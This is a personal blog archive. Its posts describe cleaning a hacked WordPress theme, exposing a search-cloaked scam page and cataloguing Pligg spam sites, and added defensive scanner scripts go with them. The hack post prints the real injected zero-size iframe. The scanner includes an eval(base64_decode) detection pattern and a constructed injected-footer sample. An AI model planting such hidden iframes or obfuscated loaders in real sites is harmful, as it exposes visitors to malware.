Tag Archive: SQL

Hacked – I was a possible Malware Site for tructuyenso.vn!

Introduction

A few days ago I got hacked.  I quickly ripped out a heap of dodgy files left by the hackers but for some days now, Firefox, my browser, while viewing pages on this website, has been saying that it’s “downloading data from tructuyenso.vn… “.

.htaccess

This, of course, was not actually happening, as I’ve put the blockers on the whole of Vietnam using .htaccess!  The reason for this is that initially, tructuyenso wasn’t the only site appearing in the progress tip – there was another which lasted until I got rid of the various files dumped on my website.  This is how:

# Apache 2.2 syntax: "order allow,deny" checks Allow lines first, then Deny,
# so any request matching a Deny line is refused.
# <Limit GET POST> scopes this to GET (which covers HEAD) and POST only.
# This filters requests arriving at the server; it cannot stop a visitor's
# browser fetching whatever an injected page element points at.
<Limit GET POST>
order allow,deny
deny from 112.0.0.0/8
allow from all
</Limit>

However, the call was still being made from somewhere on my site, as the progress indicator wouldn't stop.

Site5 Search

A search for the string “tructuyenso.vn” turned up nothing in the files on my website using my website host’s file manager.  (In the end, this was my failing and I will not rely on the thing again!)

A search through my database also turned up zero.

TCPView

TCPView is a download from Sysinternals.com (now Microsoft!) that shows the various network connections to and from one's PC. This immediately showed that as soon as the main strangelyperfect.tv website (not the backend WordPress admin area) fired up in Firefox, as many as 7 connections were simultaneously made to 112.78.15.230. This is the IP address that holds tructuyenso.vn, plus 11 other domains, some of which I'd seen flash through the progress bar.

Even when closed by TCPView, the connections would immediately start up again to the same IP address, 112.78.15.230  (manually closing strangelyperfect.tv stopped the connections).

Reverse IP on tructuyenso.vn

YouGetSignal.com shows the domains up nicely in the screenshot above.

Result!

Finding nowt anywhere and Google searches providing zilch on the website in question except in Vietnamese, I turned to the WordPress Codex, specifically, https://codex.wordpress.org/FAQ_My_site_was_hacked

I had of course previously changed my FTP, MySQL database and site management passwords, but the link at the bottom to a website malware & blacklist scan (Sucuri) was the killer! On visiting Sucuri, it instantly said that I was acting as a host for malware and gave the offending results, for free! (Of course, I wasn't hosting malware myself; the page was merely pointing visitors at it, hence the slowness of the site to load as the browser tried and failed to download shite my way from Vietnam.)

This is their take on it: http://sucuri.net/malware/malware-entry-mwiframehd202

Final Cause and Clean Up

Checking the source code for my homepage (which in retrospect I should have done first!!) threw up “tructuyenso.vn” right at the very bottom.  This is the code as it was when I checked:

<a href="http://tructuyenso.vn" title="Quang cao truc tuyen | Ban hang truc tuyen | Dien dan quang cao truc tuyen" > Quang cao truc tuyen</a>
<iframe marginWidth="0" marginHeight="0" frameBorder="0" width="0" height="0" bottommargin="0" rightmargin="0" leftmargin="0" topmargin="0" nosize scrolling="no" src="http://tructuyenso.vn/"></iframe>
</body>
</html>

This was then easily traced to the footer.php file in my theme, Suffusion.

It was simply stripped out and the website then worked fine, but to be sure, I downloaded a fresh copy of the theme and checked its footer file: it's clean! I then uploaded a whole clean Suffusion theme in its entirety, just in case any other theme files were compromised during the original hack yet were dormant, waiting for a trigger.
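
The file-manager search above missed the injected iframe, and the fix was only found by reading the rendered page source. The following script is an added example (my code, not the blog author's or the Suffusion theme's) that walks a theme or site directory and reports the two things this post turned on: an <iframe> that is sized to zero or hidden by style, or that loads from a host outside an allowlist, and the common obfuscated-PHP pattern `eval(base64_decode(...))`. The allowlist (strangelyperfect.tv), the placeholder host evil.example and the sample footer contents are all constructed for the example.

```python
"""Scan theme files for injected hidden iframes and obfuscated PHP (added example)."""
import os
import re
import sys
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts the site legitimately frames content from; an assumption for this example.
# strangelyperfect.tv is the site in the post; extend the set for your own setup.
OWN_HOSTS = {"strangelyperfect.tv", "www.strangelyperfect.tv"}

# Widely used obfuscated-PHP injection shape (generic signature, not from the post).
EVAL_RE = re.compile(r"eval\s*\(\s*(?:base64_decode|gzinflate|str_rot13)\s*\(", re.I)


def _tiny(value):
    """True for width/height values such as 0, 0px or 1 that make a frame invisible."""
    if value is None:
        return False
    digits = value.strip().lower().replace("px", "").replace("%", "")
    return digits in ("0", "1")


class IframeFinder(HTMLParser):
    """Collect <iframe> tags that are hidden or load from a foreign host."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k.lower(): (v or "") for k, v in attrs}   # bare attrs like "nosize" become ""
        src = a.get("src", "")
        host = (urlparse(src).hostname or "").lower()
        style = a.get("style", "").replace(" ", "").lower()
        hidden = (_tiny(a.get("width")) or _tiny(a.get("height"))
                  or "display:none" in style or "visibility:hidden" in style)
        line = self.getpos()[0]
        if hidden:
            self.findings.append({"line": line, "kind": "hidden-iframe", "src": src})
        elif host and host not in OWN_HOSTS:
            self.findings.append({"line": line, "kind": "external-iframe", "src": src})


def scan_text(text):
    """Return findings for one file's contents, ordered by line number."""
    finder = IframeFinder()
    finder.feed(text)
    finder.close()
    findings = list(finder.findings)
    for lineno, line in enumerate(text.splitlines(), start=1):
        if EVAL_RE.search(line):
            findings.append({"line": lineno, "kind": "obfuscated-eval", "src": ""})
    return sorted(findings, key=lambda f: f["line"])


def scan_tree(root, exts=(".php", ".html", ".htm")):
    """Walk a theme or site directory and map each flagged file to its findings."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                found = scan_text(fh.read())
            if found:
                report[os.path.relpath(path, root)] = found
    return report


# Constructed sample files: a clean footer and one carrying a zero-size iframe of
# the kind found in the post (placeholder host, and a base64 string that just
# decodes to "PLACEHOLDER").
CLEAN_FOOTER = """<?php wp_footer(); ?>
</body>
</html>
"""

INJECTED_FOOTER = """<?php wp_footer(); ?>
<?php eval(base64_decode('UExBQ0VIT0xERVI=')); ?>
<a href="http://evil.example" title="constructed sample">link</a>
<iframe marginWidth="0" marginHeight="0" frameBorder="0" width="0" height="0" nosize scrolling="no" src="http://evil.example/"></iframe>
</body>
</html>
"""

if __name__ == "__main__":
    if len(sys.argv) > 1:
        for path, found in scan_tree(sys.argv[1]).items():
            for f in found:
                print(f"{path}:{f['line']}: {f['kind']} {f['src']}")
    else:
        for f in scan_text(INJECTED_FOOTER):
            print(f"footer.php:{f['line']}: {f['kind']} {f['src']}")
```

Run it against a downloaded copy of wp-content/themes to get a file:line list; the same run against a fresh theme download gives the baseline to compare with, which is the "is it clean?" check the post describes doing by hand.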

A recheck on Sucuri shows my website to be okay now. See screendump below. I'll be using Sucuri a lot more!

Sucuri Site Check

Site Outage

Strangely post on September 7th, 2011

My host, Site5.com, has kindly told me that this site (and others of mine) will be off-line from tonight for 3 hours from 07 Sep 2011 23:00 GMT/UTC until 08 Sep 2011 02:00 GMT/UTC.  (I’ve had to convert this from the email which is CDT specific…)

This is due to an upgrade of the MySQL databases to something called Percona, which is a new one on me! Checking it out, it is a custom install of MySQL, with extra management software clagged on.

Windows Defrag to News 9 Today Browser Scam

Free Windows Defragmenter Search

Take this as a scam and a half: a way of rigging the Google search results!

Defrag Search Results

Today I was looking for an old defrag program, but couldn’t remember the name – so I went to Google.  That’s the screenshot on the right.

The second result looked promising.  After all, the text says,

Anyone know what is currently the best defragmenter for Windows 7 x64 64 bit, and why? Does it have any problems?

News 9 Today  (news9today.org)

News9 Today

Unfortunately, tehparadox.com is not all it seems.  The page actually referenced is http://tehparadox.com/forum/f85/best-defragmenter-windows-7-x64-452359/, which looks kosher enough, but it has nothing at all to do with disc defragmenters, and everything to do with get rich quick schemes!! (That is a screenshot on the left).

It’s like all the other fake news sites that we’ve seen recently, except in this case, the whole meta data of the website is built to deceive the search engines!

For instance, the title stays in the browser tabs, saying,

“Best defragmenter for Windows 7 x64 64 bit?”

The whole html source code is here.  You’ll see that the meta data bit reads:

name="keywords" content="Best,defragmenter,Windows,7,x64,64,bit, Best defragmenter for Windows 7 x64 64 bit?, downloads,free,resources,online,sharing,community,movies,games,720p,1080p,anime,applications,music,tv shows,e-books,comic books,discussions,warez,dvdr,rapidshare,megaupload,netload,hotfile,fileserve,filesonic"

name="description" content="Anyone know what is currently the best defragmenter for Windows 7 x64 64 bit, and why? Does it have any problems? Or should I just use the default one that comes with Windows 7? Thanks."

Where Does it Point?

The links all go to

https://ssl.clickbank.net/order/restricted.html?errCode=accntstate&cbhopvendor=homejonlin

which then redirects to

http://www.home-online-jobs.org/check-positions-available/?hop=maspromo
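
The tell in this page is the gap between what the <title> and meta tags promise (a defragmenter thread) and what the visible text and links actually do (send everyone to one off-site affiliate host). The script below is an added example, not code from the post or from any of the sites named in it: it profiles a page with Python's HTMLParser and scores that gap as two numbers, the share of metadata words that also appear in the visible text, and the share of links pointing off-site. The thresholds, the stop-word list and the two sample pages (hosts affiliate.example, forum.example, vendor.example) are constructed for the example.

```python
"""Heuristic check for search-cloaked pages: the <title> and meta tags describe one
topic while the visible text and links serve another (added example)."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

WORD_RE = re.compile(r"[a-z0-9]+")
STOP = {"the", "and", "for", "with", "that", "this", "from", "you", "your",
        "are", "what", "know", "any", "all", "now", "but", "not", "can"}


class PageProfile(HTMLParser):
    """Pull out title, named meta tags, visible text and link hosts."""

    def __init__(self):
        super().__init__()
        self.title = ""
        self.meta = {}
        self.text = []
        self.link_hosts = []
        self._in_title = False
        self._skip = 0          # depth inside <script>/<style>, whose text is not visible

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "meta" and a.get("name"):
            self.meta[a["name"].lower()] = a.get("content", "")
        elif tag == "title":
            self._in_title = True
        elif tag == "a" and a.get("href"):
            host = urlparse(a["href"]).hostname
            if host:
                self.link_hosts.append(host.lower())
        elif tag in ("script", "style"):
            self._skip += 1

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False
        elif tag in ("script", "style") and self._skip:
            self._skip -= 1

    def handle_data(self, data):
        if self._in_title:
            self.title += data
        elif not self._skip:
            self.text.append(data)


def tokens(s):
    """Lower-cased content words, dropping very short tokens and stop words."""
    return {w for w in WORD_RE.findall(s.lower()) if len(w) > 2 and w not in STOP}


def assess(html, own_host, min_overlap=0.3, max_offsite=0.8):
    """Score how well the page's metadata matches what it actually shows and links to."""
    p = PageProfile()
    p.feed(html)
    p.close()
    promised = tokens(" ".join([p.title, p.meta.get("description", ""),
                                p.meta.get("keywords", "").replace(",", " ")]))
    shown = tokens(" ".join(p.text))
    overlap = len(promised & shown) / len(promised) if promised else 1.0
    offsite = [h for h in p.link_hosts if h != own_host.lower()]
    share = len(offsite) / len(p.link_hosts) if p.link_hosts else 0.0
    verdict = "suspicious" if overlap < min_overlap and share > max_offsite else "ok"
    return {"meta_overlap": round(overlap, 2), "offsite_link_share": round(share, 2),
            "offsite_hosts": sorted(set(offsite)), "verdict": verdict}


# Constructed samples: a cloaked page shaped like the one in the post, and an honest thread.
CLOAKED = """<html><head><title>Best defragmenter for Windows 7 x64 64 bit?</title>
<meta name="description" content="Anyone know what is currently the best defragmenter for Windows 7 x64 64 bit?">
<meta name="keywords" content="defragmenter,windows,7,x64,warez,rapidshare">
</head><body>
<h1>Work from home and earn thousands every week</h1>
<p>Positions available now. Click to check positions in your area.</p>
<a href="http://affiliate.example/order?id=1">Apply</a>
<a href="http://affiliate.example/order?id=2">Check positions</a>
<a href="http://affiliate.example/order?id=3">Start today</a>
</body></html>"""

HONEST = """<html><head><title>Best defragmenter for Windows 7 x64?</title>
<meta name="description" content="Forum thread comparing defragmenter tools for Windows 7 x64.">
</head><body>
<p>Which defragmenter do you use on Windows 7 x64? The built-in tool works for most people.</p>
<a href="http://forum.example/thread/1">Reply</a>
<a href="http://vendor.example/defrag">Vendor page</a>
</body></html>"""

if __name__ == "__main__":
    print(assess(CLOAKED, "tehparadox.example"))
    print(assess(HONEST, "forum.example"))
```

Both numbers matter together: a legitimate forum page links off-site too, so a high off-site share alone is not a signal, while a page whose metadata shares almost no vocabulary with its own body text is the keyword-stuffing pattern quoted above.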

WHOIS www.home-online-jobs.org

Well, they're hidden of course. You should know what I think of businesses that choose to be anonymous, but to repeat, I think they're shite. See http://whois.domaintools.com/home-online-jobs.org for their "details".

Noticeably, they have very peculiar name servers:

Name Server:NS1.MYHOMEWEALTHSYSTEM.COM

Name Server:NS2.MYHOMEWEALTHSYSTEM.COM

MYHOMEWEALTHSYSTEM.COM

This bunch of jokers is also hidden, see http://whois.domaintools.com/myhomewealthsystem.com, but they do have an actual web page promoting much the same stuff. This was seriously debunked by Paul at WorkAtHomeTruth back in March 2010. He has more red flags going on it than the semaphore kid.

The Biggest Killer Laugh of All

News9 Today Small Print

MyHomeWealthSystem at least has a web page.

Now go back to the top and examine News9Today.  Down at the bottom of their small print, they say:

Copyright 2010 © News9Today.org All Rights Reserved.

Hmm?  A website URL.  I wonder what it looks like?

Well actually, if you can recall the CNN logos at the top of the page, like so (directly from their server):

Tehparadox

As seen on CNN? Ha Ha!

After getting the link to the header image above which is sourced from http://www.news9today.org/home-job-news/index_files/features16.jpg, I back-spaced to go back to the News9 Today page – and ended up on the tehparadox page here:  http://tehparadox.com/forum/f85/best-defragmenter-windows-7-x64-452359/

You see in the screenshot that the top advert is a “Google Is Hiring” scam advert?  Where does it go?

A. Well http://www.news9today.org/home-online-job-positions/?tid=hojab6 of course!

Conclusion

Somehow the browser has been redirected from the Google search page to the header advert from the tehparadox website.  This could be SQL injection or a bug in their server or my browser setup.

Whatever, this really stinks, and it’s a new thing to be wary about.

What is the Best Backup for Windows in a Small Home or Office?

Which Windows Backup?  A History.

Over the years I've tried many systems for backing up crucial Windows data. Currently, for small-scale backups, I use the ubiquitous and almost bullet-proof flash drives, my current one tipping the scales at 8Gb. But for major backups, as the years have passed, I've used:

  1. Floppy discs – 1.4Mb
  2. Iomega Zip discs – 100Mb
  3. CDRW – 650Mb
  4. DVD-R – 4.7Gb
  5. Western Digital My Book Home Edition – 1Tb

They all had their problems and limitations. The last one looked good with Firewire, USB2, ethernet & eSATA connections, but it overheated and broke.

Best Windows Backup!

My current system is from Synology and is a “DS210j – Budget-friendly 2-bay NAS server for Home and Small Business”

See: http://www.synology.com/enu/products/DS210j/index.php

I can heartily recommend the thing.  It has so much gubbins within it and far exceeds my limited expectations.  I installed two green 2Tb drives from Western Digital  in mirrored RAID for security and use the auto-backup software provided as well as Windows’ own.  This is extremely relevant for the large number of hits I’ve had to this posting where a major part of the problem is the time taken to do a backup!  In my case, the 750Gb just takes a few hours to copy across the Gigabit speed ethernet that the unit can use.

Addendum June 2011: The tool is a seriously capable bit of kit and I cannot recommend it enough. Get one!

It does everything it says on the tin, and more!  The whole thing cost me about 200 quid, plus an hour of my time to install.

Even its firewall is more configurable than any router I've used! It can be used as a server for FTP or the web. It comes with software for a host of things that mimic Flickr etc. but without all the privacy or security issues inherent in off-line storage. It'll also work with any operating system, because it is itself a mini-Linux installation, and it includes Windows, Apple and Linux applications.
Check it out, straight from their overview page:

Build Your Entertainment Center

Download Station 2 functions as a 24×7 BitTorrent, FTP, HTTP, eMule, and NZB download center. RapidShare and RSS download are now supported.

DLNA Compliant Media Server ensures compatibility and interoperability between Disk Station and a wide range of DLNA-certified home devices.

iTunes Server provides an easy way to share music and videos with other iTunes clients within the local network. You can create playlists with songs that match the criteria you specified, and best of all, iTunes will update these playlists automatically as you add or delete songs.

Audio Station supports music, Internet radio stations, and iPod playback with connected USB speakers. Web-streaming mode allows your music to be shared with multiple users over the Internet.

Back Up Your Precious Data

DSM 2.2 offers comprehensive solutions for you to back up data stored on Disk Station or your desktop computer to the Disk Station.

Server backup includes two alternatives: Network Backup and Local Backup. Both allow you to back up data in the shared folders and databases. Incremental backup option and flexible schedules are available. All can be easily configured with a step-by-step wizard.

Desktop backup provides Windows PC users with the Synology Data Replicator 3 for backing up desktop data, Outlook, and Outlook Express emails to their Disk Station by choosing one of the three backup modes: Immediate, Sync, and Scheduled backup, while Mac OS X users can use Apple Time Machine backup application to back up their critical data to Disk Station.

USBCopy allows you to quickly back up your data from an USB storage device such as an USB flash or USB card reader to the Disk Station with just one single touch on the front-panel Copy button.

Enrich Your Web Presence

Photo Station 3 simplifies photo, video, and blog sharing over the Internet. The flexibility of photo theme customization, blog layout arrangement, visitor's privilege setting, RSS feed, and the dazzling 3-dimensional photo browsing with Cooliris make Photo Station 3 your state-of-the-art lifestyle sharing center on the Internet.

Web Station with built-in PHP+MySQL allows users to publish their own websites or install numerous popular open-source programs.

Access With Your iPhone/Mobile Device

The iPhone App DS audio allows Disk Station users to stream music stored on Disk Station with their iPhone/iPod® touch where Internet access is available, while DS photo allows uploading photos from the iPhone/iPod® touch to their Disk Station.

Users with a mobile device running on Windows Mobile® 6.0, iPhone OS 2.2.1 onward, or Symbian OS 9.1 can log on their Disk Station to view photos with Mobile Photo Station and read supported file formats with Mobile File Station where Internet access is available.

Eco Friendly

Synology Disk Station is designed and developed perpetually with the concept of energy saving. Compared with average PC counterparts, Synology Disk Station consumes a relatively low amount of power and has the HDDs hibernate when not in use. This not only helps to save energy but also extends the lifespan of the hard disk.

Synology Disk Station truly earns the title of “green product” because of the unique Scheduled Power On/Off feature, and the smart fan design effectively cools down the system with minimum power consumption, yet keeps the system quiet on operation.

Finally, all Synology products are produced with RoHS compliant parts and packed with recyclable packing materials. Synology recognizes its responsibility as a global citizen and is continually working to reduce the environmental impact of the products we create.

Pligg Comment Spam

Introduction

An unfortunate consequence of posting stuff online is that you expose your 'work', your 'words of wisdom', your 'copyright' or your petty scrawlings (choose whichever you think is the most appropriate) to the world, and as such, it's freely copyable.

My website is proudly running on WordPress, sat on a standard shared hosting LAMP installation. Millions do likewise, as it's cheap and effective and has an inbuilt SEO optimisation function that, if you don't abuse it, actually works!

Comment spam is a pain but the various plugins and lockdowns block most of the crap.

Except last night I had two weird ones within half-an-hour of each other, that came from Pligg websites.  I’d never heard of Pligg until then, but it’s another example of CMS software.

The way that the comment spam made it as far as my filters (as most is dumped without my intervention) is that the websites seemed to do everything correctly to get proper pingbacks – except make sense!!!

Green Tea Fat Burner – Greenteafatburner.info

This one appeared against the posting watch-out-for-the-scam-double-bluff, which is highly ironic! Its WHOIS entry is 'protected' by WhoisGuard, which is to be expected. It came from IP 67.214.185.157

Weak Bladder Info – Weakbladder.info

This one appeared against the posting rapidshare-wordpress-comment-spam, which is even more ironic, if anything! Its WHOIS entry is 'protected' by WhoisGuard, again to be expected. It came from IP 209.31.180.25

Details

Both sites strip out text from websites (like mine), turn the text into postings and even apply ‘votes’ to them.  Sometimes after 3 mins!  The formulaic nature of the design is revealed by the ‘What is the ****** site all about?’ blurb down the side.    This is one, the other is almost identical.

The Weak Bladder site is a place for our community members to add resources and information that are related to Weak Bladder into one spot. We collect all of the relevant information from around the web, post it here, in the hopes that having a single resource will all us, and you, to save time when researching this topic. If you'd like to help, then register for a free membership and start contributing as an active community member.

Go for it! (not)

Postscript – later today!

Yay!  Got another.  Same blurb etc IP 76.73.41.92  This time it’s jointpainreliefs.info, and I quote;

The Joint Pain Relief site is a place where we collect information about joint pain, and how to overcome it, in one spot. We are a community dedicated to bringing you the best resources from around the web. If you’d like to join our community and help, signup! It’s free…

Perhaps I didn't make it clear before, but the 'joint pain reliefs' site contains everything... except... joint pain reliefs! It appeared on my highly related (not) post Rapidshare WordPress Comment Spam. What is it about this post that attracts the comment spammers? Surely they're not going for the phrase 'Comment Spam'? And don't call me Shirley!

Post-Postscript 9 June 2009

I’ve got another two almost identical comment spam/content scraping hits against the same post Rapidshare WordPress Comment Spam!!!  What is their game…

So I’m going to make a little list of them now.  Also, I’m starting a competition to guess the next bizarre subject matter of the Pligg based website.  My guess is eyelashmiteproblem.info, but I could be wrong …  It could be itchyarse.info or something.  It won’t be from these IP addresses though as I’ve blocked them.

So far, I have:

Website                     IP Address
Greenteafatburner.info      67.214.185.157
Weakbladder.info            209.31.180.25
jointpainreliefs.info       76.73.41.92
menopausereliefsite.info    67.214.185.157
toenailfungusite.info       67.214.185.157

I think it’s time I started adding a few blocks to my .htaccess file, ha ha. If you don’t know how to do this, read here.
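
These scrapers got through because they satisfy the one thing a pingback is checked for: the source page links back to the post. The script below is an added example (my code, not the blog's or WordPress's) showing the extra check a defender would want: after confirming the backlink, it measures how much of the original post the source page reproduces verbatim, using five-word shingles, and it turns the IP list above (plus the 14 June entry) into Apache 2.2-style deny lines with the repeated 67.214.185.157 collapsed to one rule. The post text, the two sample source pages and the target URL path are constructed; the scrape threshold of 0.5 is an assumption.

```python
"""Triage an incoming pingback: does the source really link here, and how much of
our post has it scraped?  Then turn repeat offenders into .htaccess rules (added example)."""
import re
from html.parser import HTMLParser

WORD_RE = re.compile(r"[a-z0-9]+")

# Entries from the post's list, including the 14 June addition.
SPAM_SOURCES = [
    ("Greenteafatburner.info", "67.214.185.157"),
    ("Weakbladder.info", "209.31.180.25"),
    ("jointpainreliefs.info", "76.73.41.92"),
    ("menopausereliefsite.info", "67.214.185.157"),
    ("toenailfungusite.info", "67.214.185.157"),
    ("OnlyOutdoorRugs.info", "204.124.181.57"),
]


class LinksAndText(HTMLParser):
    """Collect every href and all text from the pingback source page."""

    def __init__(self):
        super().__init__()
        self.hrefs = []
        self.text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for k, v in attrs:
                if k == "href" and v:
                    self.hrefs.append(v)

    def handle_data(self, data):
        self.text.append(data)


def shingles(text, n=5):
    """Set of n-word windows; verbatim copying shows up as shared windows."""
    words = WORD_RE.findall(text.lower())
    return {tuple(words[i:i + n]) for i in range(len(words) - n + 1)}


def triage_pingback(source_html, target_url, our_post_text, scrape_threshold=0.5):
    """Classify a pingback source as no-backlink, scraper or legitimate."""
    p = LinksAndText()
    p.feed(source_html)
    p.close()
    links_back = target_url in p.hrefs            # the WordPress pingback precondition
    ours = shingles(our_post_text)
    copied = len(ours & shingles(" ".join(p.text))) / len(ours) if ours else 0.0
    if not links_back:
        verdict = "no-backlink"
    elif copied >= scrape_threshold:
        verdict = "scraper"
    else:
        verdict = "legitimate"
    return {"links_back": links_back, "copied_fraction": round(copied, 2), "verdict": verdict}


def htaccess_deny(entries):
    """Emit Apache 2.2-style deny lines, one per distinct IP, in first-seen order."""
    seen = []
    for _site, ip in entries:
        if ip not in seen:
            seen.append(ip)
    lines = ["# generated from the Pligg scraper list", "order allow,deny"]
    lines += [f"deny from {ip}" for ip in seen]
    lines.append("allow from all")
    return "\n".join(lines) + "\n"


# Constructed stand-ins: our post, a scraper page that copies most of it and
# links back, and a genuine page that links back and quotes only the title.
TARGET_URL = "https://strangelyperfect.tv/watch-out-for-the-scam-double-bluff/"

OUR_POST = ("Watch out for the scam double bluff. A site that warns you about scams can "
            "itself be the scam. Check the registrant, check where the links go, and never "
            "trust a page just because it says it is here to protect you.")

SCRAPER_PAGE = f"""<p>The Scam Watch site is a place for our community members to add resources.</p>
<p>Watch out for the scam double bluff. A site that warns you about scams can itself be
the scam. Check the registrant, check where the links go, and never trust</p>
<a href="{TARGET_URL}">Read more</a>"""

LEGIT_PAGE = f"""<p>A good write-up on double bluff scams:
<a href="{TARGET_URL}">Watch out for the scam double bluff</a>. Worth reading.</p>"""

if __name__ == "__main__":
    print(triage_pingback(SCRAPER_PAGE, TARGET_URL, OUR_POST))
    print(triage_pingback(LEGIT_PAGE, TARGET_URL, OUR_POST))
    print(htaccess_deny(SPAM_SOURCES))
```

The backlink test alone is what the spam sites pass; the copied fraction is what separates them from a real reader quoting a line. The generated rules use the same `order allow,deny` syntax as the .htaccess block earlier on this page (Apache 2.4 would want `Require not ip` instead), and they are not wrapped in `<Limit>`, so they apply to every request method.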

Post-PostScript 14 June 2009

The next entry in the Pligg wall of shame came this morning from:

OnlyOutdoorRugs.info at IP 204.124.181.57. This is a US based host. It targeted this wholly unrelated post of mine, Chatelus Malvaleix on Google Earth Tour de France Map

I’m now left wondering what to do with an Outdoor Rugs, especially when it rains!  The world has gone mad.  Rugs for outside has to be the height of decadence – unless they are normal rugs that you take outside to sit on. But then they’d be indoor rugs. So outdoor rugs must be for dry countries where it never rains.  My brain hurts.

© 2007-2017 Strangely Perfect All Rights Reserved -- Copyright notice by me